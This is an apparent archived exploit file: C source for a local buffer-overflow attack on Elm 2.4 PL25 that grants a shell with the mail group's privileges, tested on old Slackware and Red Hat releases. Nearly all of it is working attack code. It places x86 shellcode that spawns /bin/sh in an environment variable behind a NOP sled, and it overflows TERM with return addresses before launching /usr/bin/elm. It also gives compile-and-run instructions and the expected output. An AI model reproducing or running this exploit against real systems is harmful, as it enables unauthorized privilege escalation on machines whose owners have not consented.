Elm 2.4 PL25 local GID mail exploit. Tested under Slackware 3.6, 4.0, Redhat 5.0, and 5.1.
558a726bce68d1bb599a32adc7f23c60678255c07a67495d810c8a54c8097694
/*
* Elm 2.4 PL25 sploit
* funkySh '99
* tested under Slackware 3.6, 4.0
* Redhat 5.0,5.1
* gcc -o elmex elmex.c ; ./elmex [offset]
* bash$ id
* [..] egid=12(mail)
*/
#define SIZE_P 5500
#define SIZE_D 200
#define NOP 0x90
#define RET_ADDR 0xbffff8a0
#define PATH "/usr/bin/elm"
char code[]="\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c"
"\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb"
"\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh";
char buffer_p[SIZE_P];
char buffer_d[SIZE_P];
void main(int argc, char * argv[])
{ int i, x, offset = 0;
long address;
if(argc > 1) offset = atoi(argv[1]);
address = RET_ADDR + offset;
for(i = 0; i < SIZE_P/3; i++)
buffer_p[i] = NOP;
for(x = 0; x < strlen(code); i++, x++)
buffer_p[i] = code[x];
for(i = 0; i < SIZE_D/3; i++)
for (; i < SIZE_D; i += 4)
{
buffer_d[i ] = address & 0x000000ff;
buffer_d[i+1] = (address & 0x0000ff00) >> 8;
buffer_d[i+2] = (address & 0x00ff0000) >> 16;
buffer_d[i+3] = (address & 0xff000000) >> 24;
}
buffer_d[SIZE_D - 1] = 0;
setenv("DUPA", buffer_p, 1);
setenv("TERM", buffer_d, 1);
execl(PATH,PATH,0);
}